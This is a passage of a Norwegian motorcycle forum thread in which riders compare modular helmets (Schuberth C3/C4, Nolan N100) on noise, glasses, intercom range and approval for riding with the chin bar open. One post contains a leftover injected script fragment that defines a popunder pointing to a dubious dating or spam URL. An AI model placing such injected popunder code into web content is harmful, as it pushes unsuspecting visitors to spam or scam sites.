Side 4 av 4

Re: Kjøre med åpen åpningshjelm

Lagt inn: 23 jun 2020, 13:28
av o-yngve
Bilde

Re: Kjøre med åpen åpningshjelm

Lagt inn: 23 jun 2020, 18:33
av rolf-arne
Mine momenter for åpningsbar hjelm er(kanskje sagt det før) , pga at noen spør om hvorfor ikke hel hjelm/halv hjelm ..

En åpningshjelm er bedre med tanke på støy - fordi man kan fylle hjelmen bedre når du skal trø bare halve hodet inn i skallet ...
Du slipper å ta hjelmen av for å kunne prate med fergemanskap og folk i billett luka - jeg liker ikke å sinke køa som skal forbi billettluka eller over fergelemmen.
Og du kan få litt ekstra kjøling, kjapt - når du kjører sakte for å finne ut enten hvor du skal eller om du egentlig vil stoppe. (Og jeg har hatt det for varmt mange ganger :yeyeye )

Viktig for meg er at jeg får plass til hele speilrefleksen og kan bruke denne som om jeg ikke har hjelm på, Schuberthen er stor nok.

Noen tar feilaktig frem fordel med briller - men den er der ikke - jeg har ganske små briller , men kan ikke ta dem på før hjemen er på hodet..

At jeg valgte C4 var at på det tidspunktet var det den eneste fabrikanten som integrerte radio/com i hjelmen - og hittil så synes jeg at Shuberth har den beste integreringa... det som tar tid er utpakking av eskene - + 20 sekund...

En advarsel til de som gjerne ønsker seg C4 -carbon - den lettere vekta er minimal - men viktigste ned tur er at rekkevidden på com går ned til ca det halve - carbon hindrer antenne mottagelsen.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 23 jun 2020, 22:08
av o-yngve
Schubert C4 Pro

Bilde

Re: Kjøre med åpen åpningshjelm

Lagt inn: 23 jun 2020, 22:12
av Nomade
o-yngve skrev: 23 jun 2020, 13:28 Bilde
Dette er FF399, den gamle modellen.

Her er den nye FF900

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Re: Kjøre med åpen åpningshjelm

Lagt inn: 24 jun 2020, 07:49
av oivindg
rolf-arne skrev: 23 jun 2020, 18:33 Noen tar feilaktig frem fordel med briller - men den er der ikke - jeg har ganske små briller , men kan ikke ta dem på før hjemen er på hodet..
Dette har vært diskutert tidligere. For noen funker det, for andre funker det ikke.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 03 jul 2020, 23:42
av Plastrakett_71
Jeg pleier å glemme at jeg har på meg briller når jeg tar på åpningshjelmen min. Ender som regel opp med å måtte ta de av for å gjøre de rent etter å ha fått nærkontakt med øyet eller annet.... Så glemmer jeg at jeg har på briller når jeg skal ta av hjelmen igjen, og de blir dermed hengende på skrå, og jeg ser ut som en komplett idiot.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 04 jul 2020, 11:24
av L-NA
Jeg liker åpningshjelm...thats it.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 04 jul 2020, 11:33
av erik m
Grunnen til at noen hjelmer er godkjent for kjøring med åpen front og andre ikke, fikk jeg forklart på Nolans hjemmeside før jeg valgte å kjøpe en N100: Det er helt enkelt at noen kan låse fronten i åpen tilstand, og andre ikke. På N100 er det en egen låseknast som gjør at den er godkjent for det.
Faren er at dersom fronten ramler halvveis ned f.eks. når du kjører over en dump, blir du blindet av hakepartiet. Og sjøl om den ramler helt ned kan det medføre en fatal distraksjon i et avgjørende øyeblikk. Det var en referanse til en EU-bestemmelse som jeg ikke finner igjen, heller ikke den forhåndsreklamen for N100, men det virker jo logisk. Det var så vidt jeg husker i en reklame fra England, så om forbudet også gjelder i Norge aner jeg ikke.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 04 jul 2020, 12:46
av L-NA
erik m skrev: 04 jul 2020, 11:33 Grunnen til at noen hjelmer er godkjent for kjøring med åpen front og andre ikke, fikk jeg forklart på Nolans hjemmeside før jeg valgte å kjøpe en N100: Det er helt enkelt at noen kan låse fronten i åpen tilstand, og andre ikke. På N100 er det en egen låseknast som gjør at den er godkjent for det.
Faren er at dersom fronten ramler halvveis ned f.eks. når du kjører over en dump, blir du blindet av hakepartiet. Og sjøl om den ramler helt ned kan det medføre en fatal distraksjon i et avgjørende øyeblikk. Det var en referanse til en EU-bestemmelse som jeg ikke finner igjen, heller ikke den forhåndsreklamen for N100, men det virker jo logisk. Det var så vidt jeg husker i en reklame fra England, så om forbudet også gjelder i Norge aner jeg ikke.
Kan du si noe om hvordan Nolan hjelmen er i forrhold til støy? Jeg hadde Nolan tidligere, og nå en Shuberth C3. Synest denne støyer noe mer en Nolan. Så jeg planlegger å gå tilbake til Nolan. Noe du ikke er fornøyd med?

Re: Kjøre med åpen åpningshjelm

Lagt inn: 07 jul 2020, 20:16
av erik m
Nolan har mange hjelmer, og N100 skal være den mest støysvake i prissegmentet. Så da jeg kjøpte ny valgte jeg den i stedet for HJC RPHA maxEVO som jeg hadde før. Men ærlig talt merka jeg ingen forskjell, og vindstøyen er fortsatt plagsom! Kan jo si jeg har hatt verre hjelmer før, men det er en fattig trøst. Nå har jeg hatt noen sykler oppgjennom, og noen hjelmer. Og jeg har hatt flere vindskjermer med reguleringsmuligheter og "toppskjermer" på de siste to sykla, men bare oppnådd marginale forskjeller på vindstøy. Det samme med ørepropper, de beste er de som jeg har nå; "nonoise", men det skal lite til før de kommer litt ut av posisjon og da er det like ille. Vurderer å kjøpe Pinlock sine.
Nei, dette har vært et evig problem, men jeg har i det minste unngått tinnitus.

Re: Kjøre med åpen åpningshjelm

Lagt inn: 07 jul 2020, 21:48
av ErikW
erik m skrev: 07 jul 2020, 20:16 Nolan har mange hjelmer, og N100 skal være den mest støysvake i prissegmentet. Så da jeg kjøpte ny valgte jeg den i stedet for HJC RPHA maxEVO som jeg hadde før. Men ærlig talt merka jeg ingen forskjell, og vindstøyen er fortsatt plagsom! Kan jo si jeg har hatt verre hjelmer før, men det er en fattig trøst. Nå har jeg hatt noen sykler oppgjennom, og noen hjelmer. Og jeg har hatt flere vindskjermer med reguleringsmuligheter og "toppskjermer" på de siste to sykla, men bare oppnådd marginale forskjeller på vindstøy. Det samme med ørepropper, de beste er de som jeg har nå; "nonoise", men det skal lite til før de kommer litt ut av posisjon og da er det like ille. Vurderer å kjøpe Pinlock sine.
Nei, dette har vært et evig problem, men jeg har i det minste unngått tinnitus.
Har Schubert C3 og er ikke særlig plaget med vindstøy på min BMW1200RT, men sikkert skjermen som gjør sitt